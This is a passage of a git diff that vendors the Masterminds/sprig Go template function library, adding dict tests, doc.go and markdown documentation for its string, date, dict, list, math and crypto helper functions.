$d}}{{$k}}{{$v}}{{- end -}} + ` + + expect := "one1" + if err := runt(tpl, expect); err != nil { + t.Error(err) + } +} +func TestHasKey(t *testing.T) { + tpl := `{{- $d := dict "one" 1 "two" 222222 -}} + {{- if hasKey $d "one" -}}1{{- end -}} + ` + + expect := "1" + if err := runt(tpl, expect); err != nil { + t.Error(err) + } +} + +func TestPluck(t *testing.T) { + tpl := ` + {{- $d := dict "one" 1 "two" 222222 -}} + {{- $d2 := dict "one" 1 "two" 33333 -}} + {{- $d3 := dict "one" 1 -}} + {{- $d4 := dict "one" 1 "two" 4444 -}} + {{- pluck "two" $d $d2 $d3 $d4 -}} + ` + + expect := "[222222 33333 4444]" + if err := runt(tpl, expect); err != nil { + t.Error(err) + } +} + +func TestKeys(t *testing.T) { + tests := map[string]string{ + `{{ dict "foo" 1 "bar" 2 | keys | 
sortAlpha }}`: "[bar foo]", + `{{ dict | keys }}`: "[]", + `{{ keys (dict "foo" 1) (dict "bar" 2) (dict "bar" 3) | uniq | sortAlpha }}`: "[bar foo]", + } + for tpl, expect := range tests { + if err := runt(tpl, expect); err != nil { + t.Error(err) + } + } +} + +func TestPick(t *testing.T) { + tests := map[string]string{ + `{{- $d := dict "one" 1 "two" 222222 }}{{ pick $d "two" | len -}}`: "1", + `{{- $d := dict "one" 1 "two" 222222 }}{{ pick $d "two" -}}`: "map[two:222222]", + `{{- $d := dict "one" 1 "two" 222222 }}{{ pick $d "one" "two" | len -}}`: "2", + `{{- $d := dict "one" 1 "two" 222222 }}{{ pick $d "one" "two" "three" | len -}}`: "2", + `{{- $d := dict }}{{ pick $d "two" | len -}}`: "0", + } + for tpl, expect := range tests { + if err := runt(tpl, expect); err != nil { + t.Error(err) + } + } +} +func TestOmit(t *testing.T) { + tests := map[string]string{ + `{{- $d := dict "one" 1 "two" 222222 }}{{ omit $d "one" | len -}}`: "1", + `{{- $d := dict "one" 1 "two" 222222 }}{{ omit $d "one" -}}`: "map[two:222222]", + `{{- $d := dict "one" 1 "two" 222222 }}{{ omit $d "one" "two" | len -}}`: "0", + `{{- $d := dict "one" 1 "two" 222222 }}{{ omit $d "two" "three" | len -}}`: "1", + `{{- $d := dict }}{{ omit $d "two" | len -}}`: "0", + } + for tpl, expect := range tests { + if err := runt(tpl, expect); err != nil { + t.Error(err) + } + } +} + +func TestSet(t *testing.T) { + tpl := `{{- $d := dict "one" 1 "two" 222222 -}} + {{- $_ := set $d "two" 2 -}} + {{- $_ := set $d "three" 3 -}} + {{- if hasKey $d "one" -}}{{$d.one}}{{- end -}} + {{- if hasKey $d "two" -}}{{$d.two}}{{- end -}} + {{- if hasKey $d "three" -}}{{$d.three}}{{- end -}} + ` + + expect := "123" + if err := runt(tpl, expect); err != nil { + t.Error(err) + } +} + +func TestMerge(t *testing.T) { + dict := map[string]interface{}{ + "src2": map[string]interface{}{ + "h": 10, + "i": "i", + "j": "j", + }, + "src1": map[string]interface{}{ + "a": 1, + "b": 2, + "d": map[string]interface{}{ + "e": "four", + }, + 
"g": []int{6, 7}, + "i": "aye", + "j": "jay", + }, + "dst": map[string]interface{}{ + "a": "one", + "c": 3, + "d": map[string]interface{}{ + "f": 5, + }, + "g": []int{8, 9}, + "i": "eye", + }, + } + tpl := `{{merge .dst .src1 .src2}}` + _, err := runRaw(tpl, dict) + if err != nil { + t.Error(err) + } + expected := map[string]interface{}{ + "a": "one", // key overridden + "b": 2, // merged from src1 + "c": 3, // merged from dst + "d": map[string]interface{}{ // deep merge + "e": "four", + "f": 5, + }, + "g": []int{8, 9}, // overridden - arrays are not merged + "h": 10, // merged from src2 + "i": "eye", // overridden twice + "j": "jay", // overridden and merged + } + assert.Equal(t, expected, dict["dst"]) +} diff --git a/vendor/github.com/Masterminds/sprig/doc.go b/vendor/github.com/Masterminds/sprig/doc.go new file mode 100644 index 0000000000..92ea318c7e --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/doc.go @@ -0,0 +1,233 @@ +/* +Sprig: Template functions for Go. + +This package contains a number of utility functions for working with data +inside of Go `html/template` and `text/template` files. + +To add these functions, use the `template.Funcs()` method: + + t := templates.New("foo").Funcs(sprig.FuncMap()) + +Note that you should add the function map before you parse any template files. + + In several cases, Sprig reverses the order of arguments from the way they + appear in the standard library. This is to make it easier to pipe + arguments into functions. + +Date Functions + + - date FORMAT TIME: Format a date, where a date is an integer type or a time.Time type, and + format is a time.Format formatting string. + - dateModify: Given a date, modify it with a duration: `date_modify "-1.5h" now`. If the duration doesn't + parse, it returns the time unaltered. See `time.ParseDuration` for info on duration strings. + - now: Current time.Time, for feeding into date-related functions. 
+ - htmlDate TIME: Format a date for use in the value field of an HTML "date" form element. + - dateInZone FORMAT TIME TZ: Like date, but takes three arguments: format, timestamp, + timezone. + - htmlDateInZone TIME TZ: Like htmlDate, but takes two arguments: timestamp, + timezone. + +String Functions + + - abbrev: Truncate a string with ellipses. `abbrev 5 "hello world"` yields "he..." + - abbrevboth: Abbreviate from both sides, yielding "...lo wo..." + - trunc: Truncate a string (no suffix). `trunc 5 "Hello World"` yields "hello". + - trim: strings.TrimSpace + - trimAll: strings.Trim, but with the argument order reversed `trimAll "$" "$5.00"` or `"$5.00 | trimAll "$"` + - trimSuffix: strings.TrimSuffix, but with the argument order reversed: `trimSuffix "-" "ends-with-"` + - trimPrefix: strings.TrimPrefix, but with the argument order reversed `trimPrefix "$" "$5"` + - upper: strings.ToUpper + - lower: strings.ToLower + - nospace: Remove all space characters from a string. `nospace "h e l l o"` becomes "hello" + - title: strings.Title + - untitle: Remove title casing + - repeat: strings.Repeat, but with the arguments switched: `repeat count str`. (This simplifies common pipelines) + - substr: Given string, start, and length, return a substr. + - initials: Given a multi-word string, return the initials. `initials "Matt Butcher"` returns "MB" + - randAlphaNum: Given a length, generate a random alphanumeric sequence + - randAlpha: Given a length, generate an alphabetic string + - randAscii: Given a length, generate a random ASCII string (symbols included) + - randNumeric: Given a length, generate a string of digits. + - swapcase: SwapCase swaps the case of a string using a word based algorithm. see https://godoc.org/github.com/Masterminds/goutils#SwapCase + - shuffle: Shuffle randomizes runes in a string and returns the result. It uses default random source in `math/rand` + - snakecase: convert all upper case characters in a string to underscore format. 
+ - camelcase: convert all lower case characters behind underscores to upper case character + - wrap: Force a line wrap at the given width. `wrap 80 "imagine a longer string"` + - wrapWith: Wrap a line at the given length, but using 'sep' instead of a newline. `wrapWith 50, "
", $html` + - contains: strings.Contains, but with the arguments switched: `contains substr str`. (This simplifies common pipelines) + - hasPrefix: strings.hasPrefix, but with the arguments switched + - hasSuffix: strings.hasSuffix, but with the arguments switched + - quote: Wrap string(s) in double quotation marks, escape the contents by adding '\' before '"'. + - squote: Wrap string(s) in double quotation marks, does not escape content. + - cat: Concatenate strings, separating them by spaces. `cat $a $b $c`. + - indent: Indent a string using space characters. `indent 4 "foo\nbar"` produces " foo\n bar" + - nindent: Indent a string using space characters and prepend a new line. `indent 4 "foo\nbar"` produces "\n foo\n bar" + - replace: Replace an old with a new in a string: `$name | replace " " "-"` + - plural: Choose singular or plural based on length: `len $fish | plural "one anchovy" "many anchovies"` + - sha256sum: Generate a hex encoded sha256 hash of the input + - toString: Convert something to a string + +String Slice Functions: + + - join: strings.Join, but as `join SEP SLICE` + - split: strings.Split, but as `split SEP STRING`. The results are returned + as a map with the indexes set to _N, where N is an integer starting from 0. + Use it like this: `{{$v := "foo/bar/baz" | split "/"}}{{$v._0}}` (Prints `foo`) + - splitList: strings.Split, but as `split SEP STRING`. The results are returned + as an array. + - toStrings: convert a list to a list of strings. 'list 1 2 3 | toStrings' produces '["1" "2" "3"]' + - sortAlpha: sort a list lexicographically. + +Integer Slice Functions: + + - until: Given an integer, returns a slice of counting integers from 0 to one + less than the given integer: `range $i, $e := until 5` + - untilStep: Given start, stop, and step, return an integer slice starting at + 'start', stopping at `stop`, and incrementing by 'step. This is the same + as Python's long-form of 'range'. 
+ +Conversions: + + - atoi: Convert a string to an integer. 0 if the integer could not be parsed. + - int64: Convert a string or another numeric type to an int64. + - int: Convert a string or another numeric type to an int. + - float64: Convert a string or another numeric type to a float64. + +Defaults: + + - default: Give a default value. Used like this: trim " "| default "empty". + Since trim produces an empty string, the default value is returned. For + things with a length (strings, slices, maps), len(0) will trigger the default. + For numbers, the value 0 will trigger the default. For booleans, false will + trigger the default. For structs, the default is never returned (there is + no clear empty condition). For everything else, nil value triggers a default. + - empty: Return true if the given value is the zero value for its type. + Caveats: structs are always non-empty. This should match the behavior of + {{if pipeline}}, but can be used inside of a pipeline. + - coalesce: Given a list of items, return the first non-empty one. + This follows the same rules as 'empty'. '{{ coalesce .someVal 0 "hello" }}` + will return `.someVal` if set, or else return "hello". The 0 is skipped + because it is an empty value. + - compact: Return a copy of a list with all of the empty values removed. + 'list 0 1 2 "" | compact' will return '[1 2]' + - ternary: Given a value,'true | ternary "b" "c"' will return "b". + 'false | ternary "b" "c"' will return '"c"'. Similar to the JavaScript ternary + operator. + +OS: + - env: Resolve an environment variable + - expandenv: Expand a string through the environment + +File Paths: + - base: Return the last element of a path. https://golang.org/pkg/path#Base + - dir: Remove the last element of a path. https://golang.org/pkg/path#Dir + - clean: Clean a path to the shortest equivalent name. (e.g. remove "foo/.." 
+ from "foo/../bar.html") https://golang.org/pkg/path#Clean + - ext: https://golang.org/pkg/path#Ext + - isAbs: https://golang.org/pkg/path#IsAbs + +Encoding: + - b64enc: Base 64 encode a string. + - b64dec: Base 64 decode a string. + +Reflection: + + - typeOf: Takes an interface and returns a string representation of the type. + For pointers, this will return a type prefixed with an asterisk(`*`). So + a pointer to type `Foo` will be `*Foo`. + - typeIs: Compares an interface with a string name, and returns true if they match. + Note that a pointer will not match a reference. For example `*Foo` will not + match `Foo`. + - typeIsLike: Compares an interface with a string name and returns true if + the interface is that `name` or that `*name`. In other words, if the given + value matches the given type or is a pointer to the given type, this returns + true. + - kindOf: Takes an interface and returns a string representation of its kind. + - kindIs: Returns true if the given string matches the kind of the given interface. + + Note: None of these can test whether or not something implements a given + interface, since doing so would require compiling the interface in ahead of + time. + +Data Structures: + + - tuple: Takes an arbitrary list of items and returns a slice of items. Its + tuple-ish properties are mainly gained through the template idiom, and not + through an API provided here. WARNING: The implementation of tuple will + change in the future. + - list: An arbitrary ordered list of items. (This is prefered over tuple.) + - dict: Takes a list of name/values and returns a map[string]interface{}. + The first parameter is converted to a string and stored as a key, the + second parameter is treated as the value. And so on, with odds as keys and + evens as values. If the function call ends with an odd, the last key will + be assigned the empty string. Non-string keys are converted to strings as + follows: []byte are converted, fmt.Stringers will have String() called. 
+ errors will have Error() called. All others will be passed through + fmt.Sprintf("%v"). + +Lists Functions: + +These are used to manipulate lists: '{{ list 1 2 3 | reverse | first }}' + + - first: Get the first item in a 'list'. 'list 1 2 3 | first' prints '1' + - last: Get the last item in a 'list': 'list 1 2 3 | last ' prints '3' + - rest: Get all but the first item in a list: 'list 1 2 3 | rest' returns '[2 3]' + - initial: Get all but the last item in a list: 'list 1 2 3 | initial' returns '[1 2]' + - append: Add an item to the end of a list: 'append $list 4' adds '4' to the end of '$list' + - prepend: Add an item to the beginning of a list: 'prepend $list 4' puts 4 at the beginning of the list. + - reverse: Reverse the items in a list. + - uniq: Remove duplicates from a list. + - without: Return a list with the given values removed: 'without (list 1 2 3) 1' would return '[2 3]' + - has: Return 'true' if the item is found in the list: 'has "foo" $list' will return 'true' if the list contains "foo" + +Dict Functions: + +These are used to manipulate dicts. + + - set: Takes a dict, a key, and a value, and sets that key/value pair in + the dict. `set $dict $key $value`. For convenience, it returns the dict, + even though the dict was modified in place. + - unset: Takes a dict and a key, and deletes that key/value pair from the + dict. `unset $dict $key`. This returns the dict for convenience. + - hasKey: Takes a dict and a key, and returns boolean true if the key is in + the dict. + - pluck: Given a key and one or more maps, get all of the values for that key. + - keys: Get an array of all of the keys in one or more dicts. + - pick: Select just the given keys out of the dict, and return a new dict. + - omit: Return a dict without the given keys. + +Math Functions: + +Integer functions will convert integers of any width to `int64`. If a +string is passed in, functions will attempt to convert with +`strconv.ParseInt(s, 1064)`. 
If this fails, the value will be treated as 0. + + - add1: Increment an integer by 1 + - add: Sum an arbitrary number of integers + - sub: Subtract the second integer from the first + - div: Divide the first integer by the second + - mod: Module of first integer divided by second + - mul: Multiply integers + - max: Return the biggest of a series of one or more integers + - min: Return the smallest of a series of one or more integers + - biggest: DEPRECATED. Return the biggest of a series of one or more integers + +Crypto Functions: + + - genPrivateKey: Generate a private key for the given cryptosystem. If no + argument is supplied, by default it will generate a private key using + the RSA algorithm. Accepted values are `rsa`, `dsa`, and `ecdsa`. + - derivePassword: Derive a password from the given parameters according to the ["Master Password" algorithm](http://masterpasswordapp.com/algorithm.html) + Given parameters (in order) are: + `counter` (starting with 1), `password_type` (maximum, long, medium, short, basic, or pin), `password`, + `user`, and `site` + +SemVer Functions: + +These functions provide version parsing and comparisons for SemVer 2 version +strings. + + - semver: Parse a semantic version and return a Version object. + - semverCompare: Compare a SemVer range to a particular version. 
+*/ +package sprig diff --git a/vendor/github.com/Masterminds/sprig/docs/_config.yml b/vendor/github.com/Masterminds/sprig/docs/_config.yml new file mode 100644 index 0000000000..c741881743 --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/docs/_config.yml @@ -0,0 +1 @@ +theme: jekyll-theme-slate \ No newline at end of file diff --git a/vendor/github.com/Masterminds/sprig/docs/conversion.md b/vendor/github.com/Masterminds/sprig/docs/conversion.md new file mode 100644 index 0000000000..06f4f77680 --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/docs/conversion.md @@ -0,0 +1,25 @@ +# Type Conversion Functions + +The following type conversion functions are provided by Sprig: + +- `atoi`: Convert a string to an integer +- `float64`: Convert to a float64 +- `int`: Convert to an `int` at the system's width. +- `int64`: Convert to an `int64` +- `toString`: Convert to a string +- `toStrings`: Convert a list, slice, or array to a list of strings. + +Only `atoi` requires that the input be a specific type. The others will attempt +to convert from any type to the destination type. For example, `int64` can convert +floats to ints, and it can also convert strings to ints. + +## toStrings + +Given a list-like collection, produce a slice of strings. + +``` +list 1 2 3 | toStrings +``` + +The above converts `1` to `"1"`, `2` to `"2"`, and so on, and then returns +them as a list. diff --git a/vendor/github.com/Masterminds/sprig/docs/crypto.md b/vendor/github.com/Masterminds/sprig/docs/crypto.md new file mode 100644 index 0000000000..a927a45b78 --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/docs/crypto.md @@ -0,0 +1,133 @@ +# Cryptographic and Security Functions + +Sprig provides a couple of advanced cryptographic functions. + +## sha1sum + +The `sha1sum` function receives a string, and computes it's SHA1 digest. + +``` +sha1sum "Hello world!" +``` + +## sha256sum + +The `sha256sum` function receives a string, and computes it's SHA256 digest. 
+ +``` +sha256sum "Hello world!" +``` + +The above will compute the SHA 256 sum in an "ASCII armored" format that is +safe to print. + +## derivePassword + +The `derivePassword` function can be used to derive a specific password based on +some shared "master password" constraints. The algorithm for this is +[well specified](http://masterpasswordapp.com/algorithm.html). + +``` +derivePassword 1 "long" "password" "user" "example.com" +``` + +Note that it is considered insecure to store the parts directly in the template. + +## genPrivateKey + +The `genPrivateKey` function generates a new private key encoded into a PEM +block. + +It takes one of the values for its first param: + +- `ecdsa`: Generate an elyptical curve DSA key (P256) +- `dsa`: Generate a DSA key (L2048N256) +- `rsa`: Generate an RSA 4096 key + +## buildCustomCert + +The `buildCustomCert` function allows customizing the certificate. + +It takes the following string parameters: + +- A base64 encoded PEM format certificate +- A base64 encoded PEM format private key + +It returns a certificate object with the following attributes: + +- `Cert`: A PEM-encoded certificate +- `Key`: A PEM-encoded private key + +Example: + +``` +$ca := buildCustomCert "base64-encoded-ca-key" "base64-encoded-ca-crt" +``` + +Note that the returned object can be passed to the `genSignedCert` function +to sign a certificate using this CA. + +## genCA + +The `genCA` function generates a new, self-signed x509 certificate authority. + +It takes the following parameters: + +- Subject's common name (cn) +- Cert validity duration in days + +It returns an object with the following attributes: + +- `Cert`: A PEM-encoded certificate +- `Key`: A PEM-encoded private key + +Example: + +``` +$ca := genCA "foo-ca" 365 +``` + +Note that the returned object can be passed to the `genSignedCert` function +to sign a certificate using this CA. + +## genSelfSignedCert + +The `genSelfSignedCert` function generates a new, self-signed x509 certificate. 
+ +It takes the following parameters: + +- Subject's common name (cn) +- Optional list of IPs; may be nil +- Optional list of alternate DNS names; may be nil +- Cert validity duration in days + +It returns an object with the following attributes: + +- `Cert`: A PEM-encoded certificate +- `Key`: A PEM-encoded private key + +Example: + +``` +$cert := genSelfSignedCert "foo.com" (list "10.0.0.1" "10.0.0.2") (list "bar.com" "bat.com") 365 +``` + +## genSignedCert + +The `genSignedCert` function generates a new, x509 certificate signed by the +specified CA. + +It takes the following parameters: + +- Subject's common name (cn) +- Optional list of IPs; may be nil +- Optional list of alternate DNS names; may be nil +- Cert validity duration in days +- CA (see `genCA`) + +Example: + +``` +$ca := genCA "foo-ca" 365 +$cert := genSignedCert "foo.com" (list "10.0.0.1" "10.0.0.2") (list "bar.com" "bat.com") 365 $ca +``` diff --git a/vendor/github.com/Masterminds/sprig/docs/date.md b/vendor/github.com/Masterminds/sprig/docs/date.md new file mode 100644 index 0000000000..9a4f673503 --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/docs/date.md @@ -0,0 +1,88 @@ +# Date Functions + +## now + +The current date/time. Use this in conjunction with other date functions. + + +## ago + +The `ago` function returns duration from time.Now in seconds resolution. + +``` +ago .CreatedAt" +``` +returns in `time.Duration` String() format + +``` +2h34m7s +``` + +## date + +The `date` function formats a date. + + +Format the date to YEAR-MONTH-DAY: +``` +now | date "2006-01-02" +``` + +Date formatting in Go is a [little bit different](https://pauladamsmith.com/blog/2011/05/go_time.html). + +In short, take this as the base date: + +``` +Mon Jan 2 15:04:05 MST 2006 +``` + +Write it in the format you want. Above, `2006-01-02` is the same date, but +in the format we want. + +## dateInZone + +Same as `date`, but with a timezone. 
+ +``` +date "2006-01-02" (now) "UTC" +``` + +## dateModify + +The `dateModify` takes a modification and a date and returns the timestamp. + +Subtract an hour and thirty minutes from the current time: + +``` +now | date_modify "-1.5h" +``` + +## htmlDate + +The `htmlDate` function formates a date for inserting into an HTML date picker +input field. + +``` +now | htmlDate +``` + +## htmlDateInZone + +Same as htmlDate, but with a timezone. + +``` +htmlDate (now) "UTC" +``` + +## toDate + +`toDate` converts a string to a date. The first argument is the date layout and +the second the date string. If the string can't be convert it returns the zero +value. + +This is useful when you want to convert a string date to another format +(using pipe). The example below converts "2017-12-31" to "31/12/2017". + +``` +toDate "2006-01-02" "2017-12-31" | date "02/01/2006" +``` diff --git a/vendor/github.com/Masterminds/sprig/docs/defaults.md b/vendor/github.com/Masterminds/sprig/docs/defaults.md new file mode 100644 index 0000000000..c0cae90e53 --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/docs/defaults.md @@ -0,0 +1,113 @@ +# Default Functions + +Sprig provides tools for setting default values for templates. + +## default + +To set a simple default value, use `default`: + +``` +default "foo" .Bar +``` + +In the above, if `.Bar` evaluates to a non-empty value, it will be used. But if +it is empty, `foo` will be returned instead. + +The definition of "empty" depends on type: + +- Numeric: 0 +- String: "" +- Lists: `[]` +- Dicts: `{}` +- Boolean: `false` +- And always `nil` (aka null) + +For structs, there is no definition of empty, so a struct will never return the +default. + +## empty + +The `empty` function returns `true` if the given value is considered empty, and +`false` otherwise. The empty values are listed in the `default` section. + +``` +empty .Foo +``` + +Note that in Go template conditionals, emptiness is calculated for you. 
Thus, +you rarely need `if empty .Foo`. Instead, just use `if .Foo`. + +## coalesce + +The `coalesce` function takes a list of values and returns the first non-empty +one. + +``` +coalesce 0 1 2 +``` + +The above returns `1`. + +This function is useful for scanning through multiple variables or values: + +``` +coalesce .name .parent.name "Matt" +``` + +The above will first check to see if `.name` is empty. If it is not, it will return +that value. If it _is_ empty, `coalesce` will evaluate `.parent.name` for emptiness. +Finally, if both `.name` and `.parent.name` are empty, it will return `Matt`. + +## toJson + +The `toJson` function encodes an item into a JSON string. + +``` +toJson .Item +``` + +The above returns JSON string representation of `.Item`. + +## toPrettyJson + +The `toPrettyJson` function encodes an item into a pretty (indented) JSON string. + +``` +toPrettyJson .Item +``` + +The above returns indented JSON string representation of `.Item`. + +## ternary + +The `ternary` function takes two values, and a test value. If the test value is +true, the first value will be returned. If the test value is empty, the second +value will be returned. This is similar to the c ternary operator. + +### true test value + +``` +ternary "foo" "bar" true +``` + +or + +``` +true | ternary "foo" "bar" +``` + +The above returns `"foo"`. + +### false test value + +``` +ternary "foo" "bar" false +``` + +or + +``` +false | ternary "foo" "bar" +``` + +The above returns `"bar"`. diff --git a/vendor/github.com/Masterminds/sprig/docs/dicts.md b/vendor/github.com/Masterminds/sprig/docs/dicts.md new file mode 100644 index 0000000000..cfd3e27a2a --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/docs/dicts.md @@ -0,0 +1,131 @@ +# Dictionaries and Dict Functions + +Sprig provides a key/value storage type called a `dict` (short for "dictionary", +as in Python). A `dict` is an _unorder_ type. + +The key to a dictionary **must be a string**. 
However, the value can be any +type, even another `dict` or `list`. + +Unlike `list`s, `dict`s are not immutable. The `set` and `unset` functions will +modify the contents of a dictionary. + +## dict + +Creating dictionaries is done by calling the `dict` function and passing it a +list of pairs. + +The following creates a dictionary with three items: + +``` +$myDict := dict "name1" "value1" "name2" "value2" "name3" "value 3" +``` + +## set + +Use `set` to add a new key/value pair to a dictionary. + +``` +$_ := set $myDict "name4" "value4" +``` + +Note that `set` _returns the dictionary_ (a requirement of Go template functions), +so you may need to trap the value as done above with the `$_` assignment. + +## unset + +Given a map and a key, delete the key from the map. + +``` +$_ := unset $myDict "name4" +``` + +As with `set`, this returns the dictionary. + +Note that if the key is not found, this operation will simply return. No error +will be generated. + +## hasKey + +The `hasKey` function returns `true` if the given dict contains the given key. + +``` +hasKey $myDict "name1" +``` + +If the key is not found, this returns `false`. + +## pluck + +The `pluck` function makes it possible to give one key and multiple maps, and +get a list of all of the matches: + +``` +pluck "name1" $myDict $myOtherDict +``` + +The above will return a `list` containing every found value (`[value1 otherValue1]`). + +If the give key is _not found_ in a map, that map will not have an item in the +list (and the length of the returned list will be less than the number of dicts +in the call to `pluck`. + +If the key is _found_ but the value is an empty value, that value will be +inserted. + +A common idiom in Sprig templates is to uses `pluck... | first` to get the first +matching key out of a collection of dictionaries. 
+ +## merge + +Merge two or more dictionaries into one, giving precedence to the dest dictionary: + +``` +$newdict := merge $dest $source1 $source2 +``` + +This is a deep merge operation. + +## keys + +The `keys` function will return a `list` of all of the keys in one or more `dict` +types. Since a dictionary is _unordered_, the keys will not be in a predictable order. +They can be sorted with `sortAlpha`. + +``` +keys $myDict | sortAlpha +``` + +When supplying multiple dictionaries, the keys will be concatenated. Use the `uniq` +function along with `sortAlpha` to get a unqiue, sorted list of keys. + +``` +keys $myDict $myOtherDict | uniq | sortAlpha +``` + +## pick + +The `pick` function selects just the given keys out of a dictionary, creating a +new `dict`. + +``` +$new := pick $myDict "name1" "name3" +``` + +The above returns `{name1: value1, name2: value2}` + +## omit + +The `omit` function is similar to `pick`, except it returns a new `dict` with all +the keys that _do not_ match the given keys. + +``` +$new := omit $myDict "name1" "name3" +``` + +The above returns `{name2: value2}` + +## A Note on Dict Internals + +A `dict` is implemented in Go as a `map[string]interface{}`. Go developers can +pass `map[string]interface{}` values into the context to make them available +to templates as `dict`s. 
diff --git a/vendor/github.com/Masterminds/sprig/docs/encoding.md b/vendor/github.com/Masterminds/sprig/docs/encoding.md new file mode 100644 index 0000000000..1c7a36f849 --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/docs/encoding.md @@ -0,0 +1,6 @@ +# Encoding Functions + +Sprig has the following encoding and decoding functions: + +- `b64enc`/`b64dec`: Encode or decode with Base64 +- `b32enc`/`b32dec`: Encode or decode with Base32 diff --git a/vendor/github.com/Masterminds/sprig/docs/flow_control.md b/vendor/github.com/Masterminds/sprig/docs/flow_control.md new file mode 100644 index 0000000000..6414640a6a --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/docs/flow_control.md @@ -0,0 +1,11 @@ +# Flow Control Functions + +## fail + +Unconditionally returns an empty `string` and an `error` with the specified +text. This is useful in scenarios where other conditionals have determined that +template rendering should fail. + +``` +fail "Please accept the end user license agreement" +``` diff --git a/vendor/github.com/Masterminds/sprig/docs/index.md b/vendor/github.com/Masterminds/sprig/docs/index.md new file mode 100644 index 0000000000..24e17d89cc --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/docs/index.md @@ -0,0 +1,23 @@ +# Sprig Function Documentation + +The Sprig library provides over 70 template functions for Go's template language. + +- [String Functions](strings.md): `trim`, `wrap`, `randAlpha`, `plural`, etc. + - [String List Functions](string_slice.md): `splitList`, `sortAlpha`, etc. +- [Math Functions](math.md): `add`, `max`, `mul`, etc. + - [Integer Slice Functions](integer_slice.md): `until`, `untilStep` +- [Date Functions](date.md): `now`, `date`, etc. +- [Defaults Functions](defaults.md): `default`, `empty`, `coalesce`, `toJson`, `toPrettyJson` +- [Encoding Functions](encoding.md): `b64enc`, `b64dec`, etc. +- [Lists and List Functions](lists.md): `list`, `first`, `uniq`, etc. 
+- [Dictionaries and Dict Functions](dicts.md): `dict`, `hasKey`, `pluck`, etc. +- [Type Conversion Functions](conversion.md): `atoi`, `int64`, `toString`, etc. +- [File Path Functions](paths.md): `base`, `dir`, `ext`, `clean`, `isAbs` +- [Flow Control Functions](flow_control.md): `fail` +- Advanced Functions + - [UUID Functions](uuid.md): `uuidv4` + - [OS Functions](os.md): `env`, `expandenv` + - [Version Comparison Functions](semver.md): `semver`, `semverCompare` + - [Reflection](reflection.md): `typeOf`, `kindIs`, `typeIsLike`, etc. + - [Cryptographic and Security Functions](crypto.md): `derivePassword`, `sha256sum`, `genPrivateKey` + diff --git a/vendor/github.com/Masterminds/sprig/docs/integer_slice.md b/vendor/github.com/Masterminds/sprig/docs/integer_slice.md new file mode 100644 index 0000000000..8929d30363 --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/docs/integer_slice.md @@ -0,0 +1,25 @@ +# Integer Slice Functions + +## until + +The `until` function builds a range of integers. + +``` +until 5 +``` + +The above generates the list `[0, 1, 2, 3, 4]`. + +This is useful for looping with `range $i, $e := until 5`. + +## untilStep + +Like `until`, `untilStep` generates a list of counting integers. But it allows +you to define a start, stop, and step: + +``` +untilStep 3 6 2 +``` + +The above will produce `[3 5]` by starting with 3, and adding 2 until it is equal +or greater than 6. This is similar to Python's `range` function. diff --git a/vendor/github.com/Masterminds/sprig/docs/lists.md b/vendor/github.com/Masterminds/sprig/docs/lists.md new file mode 100644 index 0000000000..22441cec54 --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/docs/lists.md @@ -0,0 +1,111 @@ +# Lists and List Functions + +Sprig provides a simple `list` type that can contain arbitrary sequential lists +of data. This is similar to arrays or slices, but lists are designed to be used +as immutable data types. 
+
+Create a list of integers:
+
+```
+$myList := list 1 2 3 4 5
+```
+
+The above creates a list of `[1 2 3 4 5]`.
+
+## first
+
+To get the head item on a list, use `first`.
+
+`first $myList` returns `1`
+
+## rest
+
+To get the tail of the list (everything but the first item), use `rest`.
+
+`rest $myList` returns `[2 3 4 5]`
+
+## last
+
+To get the last item on a list, use `last`:
+
+`last $myList` returns `5`. This is roughly analogous to reversing a list and
+then calling `first`.
+
+## initial
+
+This complements `last` by returning all _but_ the last element.
+`initial $myList` returns `[1 2 3 4]`.
+
+## append
+
+Append a new item to an existing list, creating a new list.
+
+```
+$new = append $myList 6
+```
+
+The above would set `$new` to `[1 2 3 4 5 6]`. `$myList` would remain unaltered.
+
+## prepend
+
+Push an element onto the front of a list, creating a new list.
+
+```
+prepend $myList 0
+```
+
+The above would produce `[0 1 2 3 4 5]`. `$myList` would remain unaltered.
+
+## reverse
+
+Produce a new list with the reversed elements of the given list.
+
+```
+reverse $myList
+```
+
+The above would generate the list `[5 4 3 2 1]`.
+
+## uniq
+
+Generate a list with all of the duplicates removed.
+
+```
+list 1 1 1 2 | uniq
+```
+
+The above would produce `[1 2]`
+
+## without
+
+The `without` function filters items out of a list.
+
+```
+without $myList 3
+```
+
+The above would produce `[1 2 4 5]`
+
+Without can take more than one filter:
+
+```
+without $myList 1 3 5
+```
+
+That would produce `[2 4]`
+
+## has
+
+Test to see if a list has a particular element.
+
+```
+has $myList 4
+```
+
+The above would return `true`, while `has $myList "hello"` would return false.
+
+## A Note on List Internals
+
+A list is implemented in Go as a `[]interface{}`. For Go developers embedding
+Sprig, you may pass `[]interface{}` items into your template context and be
+able to use all of the `list` functions on those items.
diff --git a/vendor/github.com/Masterminds/sprig/docs/math.md b/vendor/github.com/Masterminds/sprig/docs/math.md new file mode 100644 index 0000000000..95f2f1e599 --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/docs/math.md @@ -0,0 +1,63 @@ +# Math Functions + +All math functions operate on `int64` values unless specified otherwise. + +(In the future, these will be extended to handle floats as well) + +## add + +Sum numbers with `add` + +## add1 + +To increment by 1, use `add1` + +## sub + +To subtract, use `sub` + +## div + +Perform integer division with `div` + +## mod + +Modulo with `mod` + +## mul + +Multiply with `mul` + +## max + +Return the largest of a series of integers: + +This will return `3`: + +``` +max 1 2 3 +``` + +## min + +Return the smallest of a series of integers. + +`min 1 2 3` will return `1`. + +## floor + +Returns the greatest float value less than or equal to input value + +`floor 123.9999` will return `123.0` + +## ceil + +Returns the greatest float value greater than or equal to input value + +`ceil 123.001` will return `124.0` + +## round + +Returns a float value with the remainder rounded to the given number to digits after the decimal point. + +`round 123.555555` will return `123.556` \ No newline at end of file diff --git a/vendor/github.com/Masterminds/sprig/docs/os.md b/vendor/github.com/Masterminds/sprig/docs/os.md new file mode 100644 index 0000000000..e4c197ad04 --- /dev/null +++ 